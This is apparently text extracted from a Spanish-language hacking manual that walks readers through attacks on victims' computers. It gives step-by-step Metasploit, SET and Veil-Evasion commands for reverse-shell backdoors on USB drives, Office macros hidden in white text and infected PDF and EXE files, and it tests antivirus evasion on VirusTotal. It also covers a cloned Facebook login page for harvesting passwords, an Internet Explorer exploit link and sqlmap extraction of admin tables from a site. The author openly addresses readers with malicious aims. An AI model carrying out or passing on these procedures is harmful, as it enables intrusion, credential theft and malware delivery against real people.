Академический Документы
Профессиональный Документы
Культура Документы
D1n-r3X
[Hacker tico]
D1n-r3X
[Hacker tico]
3
LIBRO ESCRITO POR: D1n-r3X {Hacker tico}
El Autor de nacionalidad Mexicana
declara que no dar informacin personal
de su verdadero nombre y datos personales
ya que por motivos personales y legales
no se har responsable por el uso de este libro,
este libro no es con fines de lucro, es una redaccin
de los conocimientos del autor D1n-r3x
Sistemas operativos usados en estelibro
Windows 7 Ultimate x64 bits (sistema primerio)
Kali Linux 1.0.9 x64bits (sistema virtual)
Parrot-Security os 1.6 x86bits (sistema virtual)
D1n-r3X
[Hacker tico]
D1n-r3X
[Hacker tico]
D1n-r3X
[Hacker tico]
D1n-r3X
[Hacker tico]
D1n-r3X
[Hacker tico]
BACKDOOR
BAD-USB
METODO 1
{Puerta trasera}
Archivo bat indetectable
& en USB autoejecutable
Iniciamos setoolkit con el comando
setoolkit, en una nueva terminal
ya iniciado seleccionamos la opcin 1)
Social engineering attacks
Despues la opcin
10) Powershell attacks vectors
Despues la opcin
1) Powershell alphanumeric Shell code
injector
D1n-r3X
[Hacker tico]
Como vemos aqu ya hay 2 terminales una de setoolkit y otra nueva por debajo la cual es la ruta de archivo bat malicioso
En setoolkit ponemos la IP de kali, y el puerto
Despues en la opcin de YES para iniciar el metasploit
y en la otra terminal como podemos ver es la ruta del archivo bay en formato txt,
la ruta es la siguiente
# cd /root/.set/reports/powershell
# ls {para ver la lista de archivos}
# cp x86_powershell_injention.txt /root/Desktop
con el comando cp copiamos el bat al escritorio para editarlo a .bat
para eso hay que renombrar el .txt por .bat
D1n-r3X
[Hacker tico]
10
D1n-r3X
[Hacker tico]
11
D1n-r3X
[Hacker tico]
12
D1n-r3X
[Hacker tico]
13
Para iniciar Meterpreter usamos el comando
sessions i 1
claro ya viendo que nos carg el exploit con xito
como podemos ver hay que mover el virus de la memoria a la computadora por si nos desconectan la usb
usaremos los comandos ps, para ver procesos id y migrate N de proceso id
D1n-r3X
[Hacker tico]
14
OFFICCE BACKDOOR
{shikata_ga_nai} {indetectable}
Como podemos ver aqu creamos un payload con extensin EXE, para despus proceder a convertirlo a VBA y poder inyectar
el cdigo en el documento de office
escriben el siguiente cdigo que se muestra en la imagen de arriba
msfpayload Windows/meterpreter/reverse_tcp LHOST=192.168.64.134 LPORT=4444 ENCODING=shikata_ga_nai x >
/root/Desktop/docx.exe
Este nos creara un EXE en el escritorio
No olvides que los comando LHOST, LPORT
se configuran a nuestra maquina Linux, es decir la IP en LHOST y el puerto deseado.
En esta captura de abajo veremos los siguientes comandos
locate exe2vba.rb
cd /usr/share/metasploit-framework/tolos/
ruby exe2vba.rb /root/Desktop/docx.exe /root/Desktop/docx.vba
{este ltimo comando nos dar nuestro archivo VBA}
Aqu ya creado el .EXE con los siguientes comandos se convertir a un archivo .VBA para poder leerlo y encriptarlo en una
macro de office, y ya creado lo pasamos el archivo .VBA a una memoria USB para proseguir con la macro.
D1n-r3X
[Hacker tico]
15
Despus que este la macro lista seguiremos con la inyeccin del texto codificado por shikata_ga_nai
IMPORTANTE, al copiar el texto se crearan varias hojas es recomendable cambiar el tamao y color
en este casa tamao 1 color blanco de preferencia para evitar que la vctima ver a algo inusual
El archivo lo guardamos como Documento Word con macro habilitada la extensin de archivo es .docm
ya guardado el archivo lo cerramos y se enva a la vctima, iniciamos metasploit
con las configuraciones de handler
y el puerto y la misma IP con la creamos el archivo exe
esperamos a que la vctima abra el documento y listo ya tenemos sesin de meterpreter
estas captura se hicieron desde mi pc con una mquina virtual para hacer ambos procesos a la vez.
D1n-r3X
[Hacker tico]
16
PDF INFECTADO
Mtodo 1
{puede ser detectado por algunos antivirus}
cargamos la consola de metasploit, ya previo los servicios de posgresql y metasploit para iniciar la consola
una vez iniciado metasploit usamos el comando
use exploit/Windows/fileformat/adobe_pdf_embedded_exe
NOTA: antes de seguir necesitamos un PDF que no est infectado , ejemplo un archivo falso con informacin que a la vctima
le parezca interesante ya sea una revista por etc., depende de la vctima en este caso usare un archivo que sera el libro pero
en formato PDF, esto es solo para demostrar este exploit el archivo publicado no tendr ningn tipo de malware
ya que este PDF es una prueba del libro sin terminar.
Este exploit lo que ara en inyectar el cdigo en un PDF para que cuando la vctima lo abra nos de acceso a su sistema sin
darse cuenta es difcil que la vctima se d cuenta dado que con el mtodo de documento de office puede que se d cuenta
por la extensin del archivo ya que es una extensin .docm
{documento con macro habilitada}
prosigamos con este otro mtodo.
D1n-r3X
[Hacker tico]
17
set filename D1n-r3X.pdf [ pueden poner el nombre que se les de en mente pero debe de terminar en .pdf ]
set infilename /root/Desktop/LA BIBLIA.pdf [las comillas dobles son solo si el archivo tiene algn espacio en el nombre,
sino es as no son necesarias ]
set outputpath /root/Desktop/ [ es para copiar el contenido del PDF al pdf infectado ]
set lhost ip de Linux aqu
set lport 4444 [ este puede varia depende del puerto abierto en la pc victima]
exploit [ aqu nos generara el PDF infectado en la carpeta /root/.msf4/local/
en una nueva terminal ejecutamos el comando siguiente
Podemos apreciar aqu el PDF original y el PDF infectado a simple vista parecen iguales
con los siguientes comandos copiamos el contenido al escritorio de kali Linux
cd /root/.msf4/local
ls [ lista de archivo en carpeta de local ]
cp D1n-r3X.pdf /root/Desktop [ comando de copiar archivo con ruta al escritorio]
D1n-r3X
[Hacker tico]
18
Una vez hecho lo siguiente configuramos nuestro metasploit a la escucha para que espere el payload del PDF infectado
D1n-r3X
[Hacker tico]
19
PDF INFECTADO
Mtodo 2
Comandos a seguir
use exploit/Windows/fileformat/coolpdf_image_stream_bof
set payload Windows/reverse_tcp
set lhost
set lport
exploit
{el PDF se guarda en la carpeta root/.msf4/local
con el nombre de msf.pdf}
Con los siguientes comando copiamos el archivo PDF a nuestro escritorio, como vemos en la imagen se ha creado con xito,
ya una vez copiado al escritorio ya sea que lo mandemos por mensaje o por correo annimo, yo en este caso infectare a la
vctima pasando el archivo a una memoria USB, pero ustedes puede usar su ingenio para ver el mtodo que le convenga ms
para lograr que el payload se cargue correctamente.
D1n-r3X
[Hacker tico]
20
HACKEO DE
FACEBOOK
{SETOOLKIT}
Abrimos setoolkit con el comando
#setoolkit
una vez abierto selecionamos la
opcin 1 Ataque de ingeniera
social, previo a esto
selecionamos la 2 ataque a
vectores de sitio web, una vez
hecho esto proseguimos con la
opcin 3 Ataque a credenciales
con el metodo havester.
una vez finalizado ponemos
nuesta ip de kali Linux y la pagina
la cual se desea optener los
datos de usuario en este caso
ser la de Facebook , esto lo que
ara es crear una pagina temporar
con el servidor de apache
abrimos una nueva terminal
para ello es necesario iniciar los
servicios de apache con el
comando # service apache2 start.
ya una vez hecho esto
mandamos el url el cual en este
caso seria la ip de kali Linux la
cual ser una clonacin de la
pagina de Facebook login.
{ el usuario ingresa sus datos y
obtendremos su correo y
contrasea}
D1n-r3X
[Hacker tico]
21
D1n-r3X
[Hacker tico]
22
Este metodo solo funciona en windows xp sp3 ya que tiene una vulnerabilidad a este exploit el cual no es detectado como
malware en Sistema xp.
{ la mayor parte de computadoras gubernamentales y de a sociaciones de gobierno en mexico tiene dicho sistema xp asi que
alos interesados les recomiendo un anlisis de las paginas de gobierno con FOCA, el cual es un programa de anlisis de
metadatos, pero no me enfocare en ese tema ya que es bajo Windows y este libro ser exclusivo para kali Linux}
D1n-r3X
[Hacker tico]
23
INYECCION DE BACKDOOR
EN CUALQUIER ARCHIVO EXE
usaremos el codificador shikata_ga_nai
para la inyeccin inversa de el payload en nuestro
archivo ese, en este caso usaremos la calculadora
de la maquina victima la cual tiene windiwows 7
-----------------------------------------------------------Nesesitamos el archivo exe el cual lo podemos encontrar
dando click derecho y en abrir ubicacin del archivo
copiamos el archivo a una usb para poder modificarlo
y cargar el payload en un nuevo archivo malicioso
------------------------------------------------------------------------------Una vez hecho esto nos pasamos a nuestro sistema kali Linux
para seguir con lo siguiente,
la codificacin con el exe a el exe cargado con el payload
D1n-r3X
[Hacker tico]
24
BACKDOOR
BAD-USB
METODO 2
D1n-r3X
[Hacker tico]
25
En la ruta de cd /root/Desktop/.set/ hay un archivo llamado template.pdf y uno llamado autorun.inf, ambos se deben de copiar a
nuestro pendrive para la ejecucin de nuestro payload de forma remota.
Con este comando vemos los
archivos creados de setoolkit ya
una vez creados y copiado damos
en la opcin yes, para cargar
nuestro metasploit precargado
gracias a set
Esta vulnerabilidad es nicamente para sistemas operativos con Windows xp
se mal, pero no tanto ya que las mayor parte de las empresas en todo Mxico y el mundo aun usan este sistema ya
sea por programas de la misma empresa que por lo general hacen programas de mano factura, tales empresas ya
sea de gobierno, o de alguno grande o mediana empresa, inclusive de alguna escuela.
D1n-r3X
[Hacker tico]
26
Como vimos antes ya creado el exploit vamos a nuestro metesploit y usamos los siguientes comandos
use exploit/multi/handler
set payload Windows/meterpreter/reverse_tcp
set lhost
set lport
Analizado en virus total. Es detectable por la mayora de los antivirus, Este exploit no necesita permisos de administrador
AUTOR DEL LIBRO:
D1n-r3X
[Hacker tico]
27
Este es el segundo archivo, hay otras alternativas de codificacin pero en este caso se provo la de shikata_ga_nai que no
sirve ya que la mayora de los antivirus lo detecta, pero no procupen que en este libro estar lo que usted busca para su
veneficion con o sin fines velignos a la sociedad.
D1n-r3X
[Hacker tico]
28
D1n-r3X
[Hacker tico]
29
------------------------------------------------------------------------------------------------------------------------------------------------------------------------Esto puede demorar unos minuto en lo que se descarga los archivos necesarios que utiliza Veil-Evasion
------------------------------------------------------------------------------------------------------------------------------------------------------------------------AUTOR DEL LIBRO:
D1n-r3X
[Hacker tico]
30
D1n-r3X
[Hacker tico]
31
D1n-r3X
[Hacker tico]
32
Es la misma instalacin, para iniciar veil, hay que usar el comando { chmod +x Veil-Evasion.py , este comando debe de ir
antes de iniciarlo con python, para descargar python usaremos el comando, apt-get install python-mechanize }
D1n-r3X
[Hacker tico]
33
Despus del comando list, seleccionamos el payload nmero 36), ya que la codificacin de este no es detectada inclusive es
mejor que el bat de setoolkit, lo configuramos con los siguientes parmetros:
set LHOST ip de Linux
set LPORT 4444 {Esto puede variar}
generate {esto nos gener nuestro archivo exe
D1n-r3X
[Hacker tico]
34
Se ejecuta sin necesidad de control de cuentas de usuario ya que en windows 7 & 8 tienen activada esta funcin
el payload no carga nada, a simple vista, pero lo que la victima no sabe esque no dio acceso total a su maquina.
D1n-r3X
[Hacker tico]
35
Configuramos el exploit/multi/handler
use exploit/multi/handler
set lhost {ip Linux}
set lport 4444
set payload windows/meterpretera/reverse_tcp
exploit
El exploit cargo al instante al momento de su ejecucin, y adems es detectable por 2 de los 56 antivirus que nos permite
analizar virus total.
Este imagen de abajo es de mi avast, y tampoco lo detecta como amenaza de ningn tipo
D1n-r3X
[Hacker tico]
36
Iexplorer update
{PARROT-SEC}
Nota algunos antivirus
pueden bloquear esto
Una vez hecho esto con el commando use exploit/windows/browser/ie_cgenericelement_uaf, proceguimos ala configuracion de
nuestro exploit con el commando show options y cambiaremos algunas opciones como SRVHOST, SRVPORT
Despues de configurar el SRVHOST con nuestra ip de parrot-sec, proseguimos a configurar nuestro objetivo en este caso
windows 7, configuramos con el siguiente comando. Show targets , Despues con set TARGET 4
Despues de set LHOST , usamos el comando exploit , y enviamos el enlace malintecionado, y listo.
D1n-r3X
[Hacker tico]
37
D1n-r3X
[Hacker tico]
38
Con el comando
use ( selecionamos el modulo, similar a
metasploit)
vamos a usar el modulo network/mitn
Despues con el comando show options
Veremos las opciones a configurar
en este caso ser el router y la ip de la pc
vitima
tambin se puede configurar el sniffer
D1n-r3X
[Hacker tico]
39
SQLMAP
(Ataque a paginas web)
Con el comando siguiente podemos analizar la pagina simpre y cuando la pagina sea vulnerable con php?=
sqlmap u www.pagina-vulnerable.com/etc.php?=27 dbs
En este comando si la pagina es vulnerable nos aparecer un dialogo con los siguientes trminos
(Y/N) En este caso usaremos la Y y poseguimos a presionar ENTER.
D1n-r3X
[Hacker tico]
40
Ya utilizando la opcin de yes en abreviacin y, veremos que la pagina carga las Bases de Datos
de qui vamos a seleccionar una, Este puede variar depende de la pagina en algunas puede mostrar mas bases de datos o
bien puede que solo salga una,
Este pagina me a mostrado 2 Bases de Datos,
(Esto esta en la pagina siguiete)
D1n-r3X
[Hacker tico]
41
Como vemos en la imagen, Tenemos 2 bases de datos disponibles, vamos seleccionar la bas, ampos_ampoweb
con el siguiete orden de comandos
sqlmap u www.pagina-vulnerable.com/etc.php?=27 D ampos_ampoweb tables
Explicacion breve.
-D ( Este comando es la orden a ejecutar de la base de datos seleccionada)
--tables (En este campos ejecutamos un orden de tablas de la base de datos)
D1n-r3X
[Hacker tico]
42
D1n-r3X
[Hacker tico]
43
Aqu podemos ver las tablas disponibles en este caso vamos a seleccionar la
siguiente tabla
Con el comando que se mostrara en la pagina siguiente nos va a mostrar las columnas de
administracin de la pagina.
el comando es el siguiente
sqlmap u www.pagina-vulnerable.com/etc.php?=27 D ampos_ampoweb T
admin_contenidos --columns
D1n-r3X
[Hacker tico]
44
D1n-r3X
[Hacker tico]